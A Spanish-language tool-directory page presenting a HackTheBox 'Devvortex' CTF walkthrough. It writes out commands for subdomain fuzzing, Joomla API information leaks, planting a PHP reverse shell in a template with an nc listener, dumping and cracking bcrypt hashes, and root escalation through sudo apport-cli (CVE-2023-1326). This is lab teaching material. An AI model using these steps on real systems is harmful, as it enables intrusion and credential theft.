Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
DEVVORTEX — Recorrido de HackTheBox Devvortex que cubre fuzzing de subdominios, enumeración de la API de Joomla, web shell basada en plantillas, cracking de hash bcrypt y escalada de privilegios mediante Apport-CLI CVE-2023-1326. | Kitploit
Herramientas/GitHubGitHub/r3fr4kt/devvortex
Descifrado de ContraseñasEscalada de PrivilegiosAnálisis de VulnerabilidadesExplotación de Aplicaciones WebRecopilación de InformaciónCTFPruebas de PenetraciónEnumeración de SubdominiosAprendizaje y EducaciónLabs y Práctica
GitHubr3fr4kt/devvortex
hace 7h 58mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

DEVVORTEX

Recorrido de HackTheBox Devvortex que cubre fuzzing de subdominios, enumeración de la API de Joomla, web shell basada en plantillas, cracking de hash bcrypt y escalada de privilegios mediante Apport-CLI CVE-2023-1326.

Ver Repositorio

DEVVORTEX

HackTheBox: Devvortex — Resolución de la Máquina

Un recorrido técnico exhaustivo que detalla el compromiso de la máquina Devvortex en HackTheBox. Esta ruta demuestra Fuzzing de Subdominios, Enumeración de la API de Joomla, Modificación de Plantillas para el acceso inicial, Extracción y Crackeo de Hashes de Base de Datos para el movimiento lateral, y la explotación de Apport-CLI (CVE-2023-1326) para la escalada de privilegios a root.


Resumen Ejecutivo

  • SO Objetivo: Linux
  • Dificultad: Fácil
  • Dominio: devvortex.htb
  • Subdominio: dev.devvortex.htb
  • Conceptos Clave: Enumeración de Subdominios, Explotación de Joomla CMS, Divulgación de Información, Crackeo de Hash Bcrypt, Abuso de Sudo (apport-cli).

1. Reconocimiento y Enumeración

Escaneo de Puertos (Nmap)

Se realizó un descubrimiento inicial rápido de puertos TCP en todos los puertos:

root@kitploit:~
nmap -Pn -n -p- --open --min-rate 5000 <TARGET_IP>

Posteriormente se ejecutó un escaneo de detección de servicios y versiones contra los puertos abiertos identificados:

Bash

root@kitploit:~
nmap -sCV --min-rate 5000 -p22,80 <TARGET_IP>

Configuración del Archivo Hosts

Añade el dominio objetivo base a tu tabla de resolución de nombres local:

Bash

root@kitploit:~
sudo nano /etc/hosts
# Append: <TARGET_IP> devvortex.htb

Descubrimiento de Subdominios (FFUF)

Fuzzing de hosts virtuales para identificar activos web adicionales:

Bash

root@kitploit:~
ffuf -u [http://FUZZ.devvortex.htb](http://FUZZ.devvortex.htb) -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ

Resultado: Se descubrió dev.devvortex.htb. Se añadió dev.devvortex.htb a /etc/hosts.

Fuzzing de Directorios

Enumeración de rutas en el host virtual recién descubierto:

Bash

root@kitploit:~
ffuf -u [http://dev.devvortex.htb/FUZZ](http://dev.devvortex.htb/FUZZ) -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt:FUZZ

Resultado: Se descubrió el endpoint /administrator, que expone un portal de autenticación de administración de Joomla.

2. Acceso Inicial (Foothold)

Fuga de Información a través de la API de Joomla

Sondeo de endpoints públicos expuestos por la API REST de Joomla para recopilar métricas sensibles de la aplicación y usuarios:

Bash

root@kitploit:~
curl -s [http://dev.devvortex.htb/api/index.php/v1/users?public=true](http://dev.devvortex.htb/api/index.php/v1/users?public=true)
curl -s [http://dev.devvortex.htb/api/index.php/v1/application?public=true](http://dev.devvortex.htb/api/index.php/v1/application?public=true)

Inyección de Web Shell mediante Plantillas del Sitio

Usando las credenciales descubiertas durante la enumeración, inicia sesión en el portal /administrator de Joomla:

  1. Navega a System > Site Templates.

  2. Selecciona la plantilla activa y abre error.php.

  3. Reemplaza el contenido de error.php con un payload estándar de reverse shell en PHP.

Inicia un listener local de netcat:

Bash

root@kitploit:~
nc -lvnp 4444

Activa la ejecución de error.php solicitando una página inexistente o accediendo directamente al archivo.

Estabilización de la Shell TTY

Una vez que la shell se conecta como www-data, genera una sesión PTY interactiva:

Bash

root@kitploit:~
python3 -c 'import pty; pty.spawn("/bin/bash")'

3. Movimiento Lateral (Logan)

Enumeración de la Base de Datos

Accede a la base de datos MySQL local usando las credenciales obtenidas de los archivos de configuración web:

Bash

root@kitploit:~
mysql -u lewis -p

Consulta la tabla de usuarios para localizar los hashes de credenciales almacenados:

SQL

root@kitploit:~
SHOW DATABASES;
USE joomla;
SHOW TABLES;
SELECT username, password FROM sd4fg_users;

Crackeo de Contraseñas Offline

Extrae el hash de contraseña bcrypt del usuario logan a un archivo local:

Bash

root@kitploit:~
nano hash.txt

Crackea el hash usando John the Ripper junto con rockyou.txt:

Bash

root@kitploit:~
john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Autenticación vía SSH

Establece una sesión SSH persistente como el usuario logan con las credenciales crackeadas:

Bash

root@kitploit:~
ssh [email protected]

Flag de Usuario

Bash

root@kitploit:~
cat user.txt

4. Escalada de Privilegios

Auditoría de Privilegios Sudo

Inspecciona los binarios permitidos para el usuario logan:

Bash

root@kitploit:~
sudo -l

Salida: El usuario puede ejecutar /usr/bin/apport-cli como root.

Explotación de Apport-CLI (CVE-2023-1326)

Comprueba la versión instalada de apport-cli:

Bash

root@kitploit:~
apport-cli --version

Inspecciona /var/crash en busca de archivos de informe existentes. Si está vacío, crea manualmente un archivo de crash:

Bash

root@kitploit:~
echo "ProblemType: Crash" > /var/crash/.crash

Lanza apport-cli contra el archivo de crash creado usando sudo:

Bash

root@kitploit:~
sudo /usr/bin/apport-cli -c /var/crash/.crash
  1. Pulsa v para View report.

  2. Cuando el paginador (less) cargue el contenido, escapa a una shell del sistema introduciendo:

Plaintext

root@kitploit:~
!/bin/bash

5. Consolidación del Sistema

Verifica la elevación a root:

Bash

root@kitploit:~
whoami
# Output: root

Flag de Root

Bash

root@kitploit:~
cat /root/root.txt
Descargar herramienta